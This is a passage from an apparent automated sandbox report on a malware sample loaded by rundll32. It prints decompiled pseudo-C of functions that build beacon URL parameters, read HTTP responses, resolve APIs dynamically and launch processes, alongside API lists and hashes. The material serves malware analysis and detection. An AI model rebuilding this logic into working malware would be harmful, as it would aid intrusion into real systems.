                                      • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                      • Instruction Fuzzy Hash: 5D21D6729003049FDF10EF69C8808EBB7A9FF45310B09956AD8999B246EB31F915CBF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 75%
                                      			E044B300E(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
                                      				intOrPtr _v4;
                                      				signed int _v8;
                                      				int* _v12;
                                      				char* _v16;
                                      				intOrPtr _v20;
                                      				void* _v24;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				void* _v40;
                                      				void* __ebx;
                                      				void* __edi;
                                      				long _t66;
                                      				intOrPtr _t67;
                                      				intOrPtr _t68;
                                      				intOrPtr _t69;
                                      				intOrPtr _t70;
                                      				intOrPtr _t71;
                                      				void* _t74;
                                      				intOrPtr _t75;
                                      				int _t78;
                                      				intOrPtr _t79;
                                      				int _t82;
                                      				intOrPtr _t83;
                                      				intOrPtr _t84;
                                      				void* _t86;
                                      				void* _t89;
                                      				intOrPtr _t93;
                                      				intOrPtr _t97;
                                      				intOrPtr* _t99;
                                      				int* _t105;
                                      				int* _t115;
                                      				char** _t117;
                                      				char* _t118;
                                      				intOrPtr* _t123;
                                      				intOrPtr* _t125;
                                      				intOrPtr* _t127;
                                      				intOrPtr* _t129;
                                      				intOrPtr _t132;
                                      				intOrPtr _t136;
                                      				int _t139;
                                      				intOrPtr _t141;
                                      				int _t144;
                                      				void* _t145;
                                      				intOrPtr _t159;
                                      				void* _t161;
                                      				int _t162;
                                      				void* _t163;
                                      				void* _t164;
                                      				long _t165;
                                      				intOrPtr* _t166;
                                      				intOrPtr* _t167;
                                      				intOrPtr _t168;
                                      				intOrPtr* _t171;
                                      				char** _t174;
                                      				char** _t176;
                                      				char** _t177;
                                      				void* _t182;
                                      
                                      				_t66 = __eax;
                                      				_t174 =  &_v16;
                                      				_t145 = _a20;
                                      				_a20 = 8;
                                      				if(__eax == 0) {
                                      					_t66 = GetTickCount();
                                      				}
                                      				_t67 =  *0x44ba018; // 0x1af7f861
                                      				asm("bswap eax");
                                      				_t68 =  *0x44ba014; // 0x3a87c8cd
                                      				asm("bswap eax");
                                      				_t69 =  *0x44ba010; // 0xd8d2f808
                                      				asm("bswap eax");
                                      				_t70 =  *0x44ba00c; // 0x8f8f86c2
                                      				asm("bswap eax");
                                      				_t71 =  *0x44ba348; // 0x9ad5a8
                                      				_t3 = _t71 + 0x44bb62b; // 0x74666f73
                                      				_t162 = wsprintfA(_t145, _t3, 3, 0x3d175, _t70, _t69, _t68, _t67,  *0x44ba02c,  *0x44ba004, _t66);
                                      				_t74 = E044B6927();
                                      				_t75 =  *0x44ba348; // 0x9ad5a8
                                      				_t4 = _t75 + 0x44bb66b; // 0x74707526
                                      				_t78 = wsprintfA(_t162 + _t145, _t4, _t74);
                                      				_t176 =  &(_t174[0xe]);
                                      				_t163 = _t162 + _t78;
                                      				if(_a24 != 0) {
                                      					_t141 =  *0x44ba348; // 0x9ad5a8
                                      					_t8 = _t141 + 0x44bb676; // 0x732526
                                      					_t144 = wsprintfA(_t163 + _t145, _t8, _a24);
                                      					_t176 =  &(_t176[3]);
                                      					_t163 = _t163 + _t144;
                                      				}
                                      				_t79 =  *0x44ba348; // 0x9ad5a8
                                      				_t10 = _t79 + 0x44bb78e; // 0x4e68d36
                                      				_t182 = _a20 - _t10;
                                      				_t12 = _t79 + 0x44bb2de; // 0x74636126
                                      				_t157 = 0 | _t182 == 0x00000000;
                                      				_t82 = wsprintfA(_t163 + _t145, _t12, _t182 == 0);
                                      				_t177 =  &(_t176[3]);
                                      				_t164 = _t163 + _t82;
                                      				_t83 = E044B22D7(_t10);
                                      				_a32 = _t83;
                                      				if(_t83 != 0) {
                                      					_t136 =  *0x44ba348; // 0x9ad5a8
                                      					_t17 = _t136 + 0x44bb8d0; // 0x736e6426
                                      					_t139 = wsprintfA(_t164 + _t145, _t17, _t83);
                                      					_t177 =  &(_t177[3]);
                                      					_t164 = _t164 + _t139;
                                      					HeapFree( *0x44ba2d8, 0, _a40);
                                      				}
                                      				_t84 = E044B2A11();
                                      				_a32 = _t84;
                                      				if(_t84 != 0) {
                                      					_t132 =  *0x44ba348; // 0x9ad5a8
                                      					_t21 = _t132 + 0x44bb8d8; // 0x6f687726
                                      					wsprintfA(_t164 + _t145, _t21, _t84);
                                      					_t177 =  &(_t177[3]);
                                      					HeapFree( *0x44ba2d8, 0, _a40);
                                      				}
                                      				_t159 =  *0x44ba3cc; // 0x4e695b0
                                      				_t86 = E044B2509(0x44ba00a, _t159 + 4);
                                      				_t165 = 0;
                                      				_a16 = _t86;
                                      				if(_t86 == 0) {
                                      					L28:
                                      					HeapFree( *0x44ba2d8, _t165, _t145);
                                      					return _a44;
                                      				} else {
                                      					_t89 = RtlAllocateHeap( *0x44ba2d8, 0, 0x800);
                                      					_a24 = _t89;
                                      					if(_t89 == 0) {
                                      						L27:
                                      						HeapFree( *0x44ba2d8, _t165, _a8);
                                      						goto L28;
                                      					}
                                      					E044B1BE9(GetTickCount());
                                      					_t93 =  *0x44ba3cc; // 0x4e695b0
                                      					__imp__(_t93 + 0x40);
                                      					asm("lock xadd [eax], ecx");
                                      					_t97 =  *0x44ba3cc; // 0x4e695b0
                                      					__imp__(_t97 + 0x40);
                                      					_t99 =  *0x44ba3cc; // 0x4e695b0
                                      					_t161 = E044B1D33(1, _t157, _t145,  *_t99);
                                      					asm("lock xadd [eax], ecx");
                                      					if(_t161 == 0) {
                                      						L26:
                                      						HeapFree( *0x44ba2d8, _t165, _a16);
                                      						goto L27;
                                      					}
                                      					StrTrimA(_t161, 0x44b928c);
                                      					_push(_t161);
                                      					_t105 = E044B393C();
                                      					_v12 = _t105;
                                      					if(_t105 == 0) {
                                      						L25:
                                      						HeapFree( *0x44ba2d8, _t165, _t161);
                                      						goto L26;
                                      					}
                                      					_t166 = __imp__;
                                      					 *_t166(_t161, _a8);
                                      					 *_t166(_a4, _v12);
                                      					_t167 = __imp__;
                                      					 *_t167(_v4, _v24);
                                      					_t168 = E044B61FC( *_t167(_v12, _t161), _v20);
                                      					_v36 = _t168;
                                      					if(_t168 == 0) {
                                      						_v8 = 8;
                                      						L23:
                                      						E044B561E();
                                      						L24:
                                      						HeapFree( *0x44ba2d8, 0, _v40);
                                      						_t165 = 0;
                                      						goto L25;
                                      					}
                                      					_t115 = E044B10B7(_t145, 0xffffffffffffffff, _t161,  &_v24);
                                      					_v12 = _t115;
                                      					if(_t115 == 0) {
                                      						_t171 = _v24;
                                      						_v20 = E044B5B9D(_t171, _t168, _v16, _v12);
                                      						_t123 =  *((intOrPtr*)(_t171 + 8));
                                      						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
                                      						_t125 =  *((intOrPtr*)(_t171 + 8));
                                      						 *((intOrPtr*)( *_t125 + 8))(_t125);
                                      						_t127 =  *((intOrPtr*)(_t171 + 4));
                                      						 *((intOrPtr*)( *_t127 + 8))(_t127);
                                      						_t129 =  *_t171;
                                      						 *((intOrPtr*)( *_t129 + 8))(_t129);
                                      						E044B6C2C(_t171);
                                      					}
                                      					if(_v8 != 0x10d2) {
                                      						L18:
                                      						if(_v8 == 0) {
                                      							_t117 = _v16;
                                      							if(_t117 != 0) {
                                      								_t118 =  *_t117;
                                      								_t169 =  *_v12;
                                      								_v16 = _t118;
                                      								wcstombs(_t118, _t118,  *_v12);
                                      								 *_v24 = E044B3C22(_v16, _v16, _t169 >> 1);
                                      							}
                                      						}
                                      						goto L21;
                                      					} else {
                                      						if(_v16 != 0) {
                                      							L21:
                                      							E044B6C2C(_v32);
                                      							if(_v12 == 0 || _v8 == 0x10d2) {
                                      								goto L24;
                                      							} else {
                                      								goto L23;
                                      							}
                                      						}
                                      						_v8 = _v8 & 0x00000000;
                                      						goto L18;
                                      					}
                                      				}
                                      			}





























































                                      APIs
                                      • GetTickCount.KERNEL32 ref: 044B3025
                                      • wsprintfA.USER32 ref: 044B3072
                                      • wsprintfA.USER32 ref: 044B308F
                                      • wsprintfA.USER32 ref: 044B30B1
                                      • wsprintfA.USER32 ref: 044B30D8
                                      • wsprintfA.USER32 ref: 044B3103
                                      • HeapFree.KERNEL32(00000000,?), ref: 044B3116
                                      • wsprintfA.USER32 ref: 044B3135
                                      • HeapFree.KERNEL32(00000000,?), ref: 044B3146
                                      • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 044B3175
                                      • GetTickCount.KERNEL32 ref: 044B3187
                                      • RtlEnterCriticalSection.NTDLL(04E69570), ref: 044B319B
                                      • RtlLeaveCriticalSection.NTDLL(04E69570), ref: 044B31B9
                                        • Part of subcall function 044B1D33: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B1D5E
                                        • Part of subcall function 044B1D33: lstrlen.KERNEL32(00000000,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B1D66
                                        • Part of subcall function 044B1D33: strcpy.NTDLL ref: 044B1D7D
                                        • Part of subcall function 044B1D33: lstrcat.KERNEL32(00000000,00000000), ref: 044B1D88
                                        • Part of subcall function 044B1D33: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,044B58D7,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B1DA5
                                      • StrTrimA.SHLWAPI(00000000,044B928C,?,04E695B0), ref: 044B31EB
                                        • Part of subcall function 044B393C: lstrlen.KERNEL32(04E69B68,00000000,00000000,00000000,044B5902,00000000), ref: 044B394C
                                        • Part of subcall function 044B393C: lstrlen.KERNEL32(?), ref: 044B3954
                                        • Part of subcall function 044B393C: lstrcpy.KERNEL32(00000000,04E69B68), ref: 044B3968
                                        • Part of subcall function 044B393C: lstrcat.KERNEL32(00000000,?), ref: 044B3973
                                      • lstrcpy.KERNEL32(00000000,?), ref: 044B320E
                                      • lstrcpy.KERNEL32(?,?), ref: 044B3218
                                      • lstrcat.KERNEL32(?,?), ref: 044B3228
                                      • lstrcat.KERNEL32(?,00000000), ref: 044B322F
                                        • Part of subcall function 044B61FC: lstrlen.KERNEL32(?,00000000,04E69D70,00000000,044B39E8,04E69F93,69B25F44,?,?,?,?,69B25F44,00000005,044BA00C,4D283A53,?), ref: 044B6203
                                        • Part of subcall function 044B61FC: mbstowcs.NTDLL ref: 044B622C
                                        • Part of subcall function 044B61FC: memset.NTDLL ref: 044B623E
                                      • wcstombs.NTDLL ref: 044B32D2
                                        • Part of subcall function 044B5B9D: SysAllocString.OLEAUT32(?), ref: 044B5BD8
                                        • Part of subcall function 044B6C2C: RtlFreeHeap.NTDLL(00000000,00000000,044B5E1D,00000000,?,?,00000000), ref: 044B6C38
                                      • HeapFree.KERNEL32(00000000,?), ref: 044B331B
                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 044B3327
                                      • HeapFree.KERNEL32(00000000,?,?,04E695B0), ref: 044B3334
                                      • HeapFree.KERNEL32(00000000,?), ref: 044B3341
                                      • HeapFree.KERNEL32(00000000,?), ref: 044B334B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Heap$Free$wsprintf$lstrlen$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                      • String ID:
                                      • API String ID: 967369141-0
                                      • Opcode ID: c138a235f9cb2e894244b28b3532a1edc7cc2bb6c1154511bbd3298339552eaa
                                      • Instruction ID: 52ad18f04605c66b86e75a6614a963dcf1d9927934a6ce8f32b5a87331cf7ef5
                                      • Opcode Fuzzy Hash: c138a235f9cb2e894244b28b3532a1edc7cc2bb6c1154511bbd3298339552eaa
                                      • Instruction Fuzzy Hash: C7A18D71504304AFEB119F69DC48E9BBBE8EF48714F051829F888E3261DA35EC54DBE1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 43%
                                      			E044B62F6(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				char _v20;
                                      				intOrPtr _v24;
                                      				signed int _v28;
                                      				intOrPtr _v32;
                                      				void* __edi;
                                      				void* __esi;
                                      				intOrPtr _t58;
                                      				signed int _t60;
                                      				signed int _t62;
                                      				intOrPtr _t64;
                                      				intOrPtr _t66;
                                      				intOrPtr _t70;
                                      				void* _t72;
                                      				void* _t75;
                                      				void* _t76;
                                      				intOrPtr _t80;
                                      				WCHAR* _t83;
                                      				void* _t84;
                                      				void* _t85;
                                      				void* _t86;
                                      				intOrPtr _t92;
                                      				intOrPtr* _t102;
                                      				signed int _t103;
                                      				void* _t104;
                                      				intOrPtr _t105;
                                      				void* _t107;
                                      				intOrPtr* _t115;
                                      				void* _t119;
                                      				intOrPtr _t125;
                                      
                                      				_t58 =  *0x44ba3dc; // 0x4e69c18
                                      				_v24 = _t58;
                                      				_v28 = 8;
                                      				_v20 = GetTickCount();
                                      				_t60 = E044B7367();
                                      				_t103 = 5;
                                      				_t98 = _t60 % _t103 + 6;
                                      				_t62 = E044B7367();
                                      				_t117 = _t62 % _t103 + 6;
                                      				_v32 = _t62 % _t103 + 6;
                                      				_t64 = E044B117A(_t60 % _t103 + 6);
                                      				_v16 = _t64;
                                      				if(_t64 != 0) {
                                      					_t66 = E044B117A(_t117);
                                      					_v12 = _t66;
                                      					if(_t66 != 0) {
                                      						_push(5);
                                      						_t104 = 0xa;
                                      						_t119 = E044B67E7(_t104,  &_v20);
                                      						if(_t119 == 0) {
                                      							_t119 = 0x44b918c;
                                      						}
                                      						_t70 = E044B659E(_v24);
                                      						_v8 = _t70;
                                      						if(_t70 != 0) {
                                      							_t115 = __imp__;
                                      							_t72 =  *_t115(_t119);
                                      							_t75 =  *_t115(_v8);
                                      							_t76 =  *_t115(_a4);
                                      							_t80 = E044B6D63(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
                                      							_v24 = _t80;
                                      							if(_t80 != 0) {
                                      								_t105 =  *0x44ba348; // 0x9ad5a8
                                      								_t102 =  *0x44ba138; // 0x44b7d4b
                                      								_t28 = _t105 + 0x44bbb30; // 0x530025
                                      								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
                                      								_push(4);
                                      								_t107 = 5;
                                      								_t83 = E044B67E7(_t107,  &_v20);
                                      								_a8 = _t83;
                                      								if(_t83 == 0) {
                                      									_a8 = 0x44b9190;
                                      								}
                                      								_t84 =  *_t115(_a8);
                                      								_t85 =  *_t115(_v8);
                                      								_t86 =  *_t115(_a4);
                                      								_t125 = E044B6D63(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
                                      								if(_t125 == 0) {
                                      									E044B6C2C(_v24);
                                      								} else {
                                      									_t92 =  *0x44ba348; // 0x9ad5a8
                                      									_t44 = _t92 + 0x44bbca8; // 0x73006d
                                      									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
                                      									 *_a16 = _v24;
                                      									_v28 = _v28 & 0x00000000;
                                      									 *_a20 = _t125;
                                      								}
                                      							}
                                      							E044B6C2C(_v8);
                                      						}
                                      						E044B6C2C(_v12);
                                      					}
                                      					E044B6C2C(_v16);
                                      				}
                                      				return _v28;
                                      			}


                                      APIs
                                      • GetTickCount.KERNEL32 ref: 044B630E
                                      • lstrlen.KERNEL32(00000000,00000005), ref: 044B638F
                                      • lstrlen.KERNEL32(?), ref: 044B63A0
                                      • lstrlen.KERNEL32(00000000), ref: 044B63A7
                                      • lstrlenW.KERNEL32(80000002), ref: 044B63AE
                                      • lstrlen.KERNEL32(?,00000004), ref: 044B6417
                                      • lstrlen.KERNEL32(?), ref: 044B6420
                                      • lstrlen.KERNEL32(?), ref: 044B6427
                                      • lstrlenW.KERNEL32(?), ref: 044B642E
                                        • Part of subcall function 044B6C2C: RtlFreeHeap.NTDLL(00000000,00000000,044B5E1D,00000000,?,?,00000000), ref: 044B6C38
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: lstrlen$CountFreeHeapTick
                                      • String ID:
                                      • API String ID: 2535036572-0
                                      • Opcode ID: dfd114b9bcafdc0400a5daa678fae1cbecd3963f89853483ce4341626a2ed0f8
                                      • Instruction ID: 469cb8f84320c9c698f7b625ead8ddb7534cedafc834c09d7733d992280c42ca
                                      • Opcode Fuzzy Hash: dfd114b9bcafdc0400a5daa678fae1cbecd3963f89853483ce4341626a2ed0f8
                                      • Instruction Fuzzy Hash: 0D51BF72D00219ABDF12AFA5DC44ADE7BB5EF44314F06802AF904A7211DB35EA21DFE5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 73%
                                      			E044B402A(void* __eax, void* __ecx) {
                                      				long _v8;
                                      				char _v12;
                                      				void* _v16;
                                      				void* _v28;
                                      				long _v32;
                                      				void _v104;
                                      				char _v108;
                                      				long _t36;
                                      				intOrPtr _t40;
                                      				intOrPtr _t47;
                                      				intOrPtr _t50;
                                      				void* _t58;
                                      				void* _t68;
                                      				intOrPtr* _t70;
                                      				intOrPtr* _t71;
                                      
                                      				_t1 = __eax + 0x14; // 0x74183966
                                      				_t69 =  *_t1;
                                      				_t36 = E044B44DE(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                      				_v8 = _t36;
                                      				if(_t36 != 0) {
                                      					L12:
                                      					return _v8;
                                      				}
                                      				E044B7A1E( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                      				_t40 = _v12(_v12);
                                      				_v8 = _t40;
                                      				if(_t40 == 0 && ( *0x44ba300 & 0x00000001) != 0) {
                                      					_v32 = 0;
                                      					asm("stosd");
                                      					asm("stosd");
                                      					asm("stosd");
                                      					_v108 = 0;
                                      					memset( &_v104, 0, 0x40);
                                      					_t47 =  *0x44ba348; // 0x9ad5a8
                                      					_t18 = _t47 + 0x44bb3f3; // 0x73797325
                                      					_t68 = E044B7326(_t18);
                                      					if(_t68 == 0) {
                                      						_v8 = 8;
                                      					} else {
                                      						_t50 =  *0x44ba348; // 0x9ad5a8
                                      						_t19 = _t50 + 0x44bb73f; // 0x4e68ce7
                                      						_t20 = _t50 + 0x44bb0af; // 0x4e52454b
                                      						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                      						if(_t71 == 0) {
                                      							_v8 = 0x7f;
                                      						} else {
                                      							_v108 = 0x44;
                                      							E044B23AA();
                                      							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                      							_push(1);
                                      							E044B23AA();
                                      							if(_t58 == 0) {
                                      								_v8 = GetLastError();
                                      							} else {
                                      								CloseHandle(_v28);
                                      								CloseHandle(_v32);
                                      							}
                                      						}
                                      						HeapFree( *0x44ba2d8, 0, _t68);
                                      					}
                                      				}
                                      				_t70 = _v16;
                                      				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                      				E044B6C2C(_t70);
                                      				goto L12;
                                      			}


                                      APIs
                                        • Part of subcall function 044B44DE: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,044B4046,?,?,?,?,00000000,00000000), ref: 044B4503
                                        • Part of subcall function 044B44DE: GetProcAddress.KERNEL32(00000000,7243775A), ref: 044B4525
                                        • Part of subcall function 044B44DE: GetProcAddress.KERNEL32(00000000,614D775A), ref: 044B453B
                                        • Part of subcall function 044B44DE: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 044B4551
                                        • Part of subcall function 044B44DE: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 044B4567
                                        • Part of subcall function 044B44DE: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 044B457D
                                      • memset.NTDLL ref: 044B4094
                                        • Part of subcall function 044B7326: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,044B40AD,73797325), ref: 044B7337
                                        • Part of subcall function 044B7326: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 044B7351
                                      • GetModuleHandleA.KERNEL32(4E52454B,04E68CE7,73797325), ref: 044B40CA
                                      • GetProcAddress.KERNEL32(00000000), ref: 044B40D1
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 044B4139
                                        • Part of subcall function 044B23AA: GetProcAddress.KERNEL32(36776F57,044B7989), ref: 044B23C5
                                      • CloseHandle.KERNEL32(00000000,00000001), ref: 044B4116
                                      • CloseHandle.KERNEL32(?), ref: 044B411B
                                      • GetLastError.KERNEL32(00000001), ref: 044B411F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                      • String ID:
                                      • API String ID: 3075724336-0
                                      • Opcode ID: 530bc3f2dae397b6c2cd42603ee8637f6dd56315ed3225ea87b98990e24ea0cd
                                      • Instruction ID: 6d7f2da4673c204cc32ff23e680c3c0f756092bd3b7f46de69453456361b746a
                                      • Opcode Fuzzy Hash: 530bc3f2dae397b6c2cd42603ee8637f6dd56315ed3225ea87b98990e24ea0cd
                                      • Instruction Fuzzy Hash: 723121B6D00219BFEF10AFA4DC88DDEBBBCEB04345F10446AE645A7212D6346D458BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E044B4A85(void* __ecx, void* __esi) {
                                      				long _v8;
                                      				long _v12;
                                      				long _v16;
                                      				long _v20;
                                      				long _t34;
                                      				long _t39;
                                      				long _t42;
                                      				long _t56;
                                      				void* _t58;
                                      				void* _t59;
                                      				void* _t61;
                                      
                                      				_t61 = __esi;
                                      				_t59 = __ecx;
                                      				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                      				do {
                                      					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                      					_v20 = _t34;
                                      					if(_t34 != 0) {
                                      						L3:
                                      						_v8 = 4;
                                      						_v16 = 0;
                                      						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
                                      							_t39 = GetLastError();
                                      							_v12 = _t39;
                                      							if(_v20 == 0 || _t39 != 0x2ef3) {
                                      								L15:
                                      								return _v12;
                                      							} else {
                                      								goto L11;
                                      							}
                                      						}
                                      						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                                      							goto L11;
                                      						} else {
                                      							_v16 = 0;
                                      							_v8 = 0;
                                      							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
                                      							_t58 = E044B6D63(_v8 + 1);
                                      							if(_t58 == 0) {
                                      								_v12 = 8;
                                      							} else {
                                      								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
                                      									E044B6C2C(_t58);
                                      									_v12 = GetLastError();
                                      								} else {
                                      									 *((char*)(_t58 + _v8)) = 0;
                                      									 *(_t61 + 0xc) = _t58;
                                      								}
                                      							}
                                      							goto L15;
                                      						}
                                      					}
                                      					SetEvent( *(_t61 + 0x1c));
                                      					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                      					_v12 = _t56;
                                      					if(_t56 != 0) {
                                      						goto L15;
                                      					}
                                      					goto L3;
                                      					L11:
                                      					_t42 = E044B6E40( *(_t61 + 0x1c), _t59, 0xea60);
                                      					_v12 = _t42;
                                      				} while (_t42 == 0);
                                      				goto L15;
                                      			}















                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,76DC81D0,00000000,00000000), ref: 044B4A9C
                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,044B593D,00000000,?), ref: 044B4AAC
                                      • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 044B4ADE
                                      • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 044B4B03
                                      • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 044B4B23
                                      • GetLastError.KERNEL32 ref: 044B4B35
                                        • Part of subcall function 044B6E40: WaitForMultipleObjects.KERNEL32(00000002,044B7BB5,00000000,044B7BB5,?,?,?,044B7BB5,0000EA60), ref: 044B6E5B
                                        • Part of subcall function 044B6C2C: RtlFreeHeap.NTDLL(00000000,00000000,044B5E1D,00000000,?,?,00000000), ref: 044B6C38
                                      • GetLastError.KERNEL32(00000000), ref: 044B4B6A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                      • String ID:
                                      • API String ID: 3369646462-0
                                      • Opcode ID: 0681c656af1bb88333daec8d86a107bf222a66f4b24f8e33296c3390e678b4db
                                      • Instruction ID: cee249cdf6d3aaf32d4c8f90b4f38571d765128afd70c9f252a0c6260861a113
                                      • Opcode Fuzzy Hash: 0681c656af1bb88333daec8d86a107bf222a66f4b24f8e33296c3390e678b4db
                                      • Instruction Fuzzy Hash: 0431F2B5904709EFDF21DFE5CC84ADFB7B8EB08304F10456AD642A2242D775AA44DBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SysAllocString.OLEAUT32(00000000), ref: 044B3F61
                                      • SysAllocString.OLEAUT32(0070006F), ref: 044B3F75
                                      • SysAllocString.OLEAUT32(00000000), ref: 044B3F87
                                      • SysFreeString.OLEAUT32(00000000), ref: 044B3FEF
                                      • SysFreeString.OLEAUT32(00000000), ref: 044B3FFE
                                      • SysFreeString.OLEAUT32(00000000), ref: 044B4009
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: String$AllocFree
                                      • String ID:
                                      • API String ID: 344208780-0
                                      • Opcode ID: 24b944799779ab0e9abc3ce19369d1ce312f7fde04243fd5fa0c85351c5735cb
                                      • Instruction ID: ea590343ab5bec8e567165819e54f6ec7c7ead4db0f1d3cedfcb69d1690f5de7
                                      • Opcode Fuzzy Hash: 24b944799779ab0e9abc3ce19369d1ce312f7fde04243fd5fa0c85351c5735cb
                                      • Instruction Fuzzy Hash: 0B415C32900A09AFDF01DFB9C844AEFB7B9EF49310F14442AED14EB211DA71A905CBA1
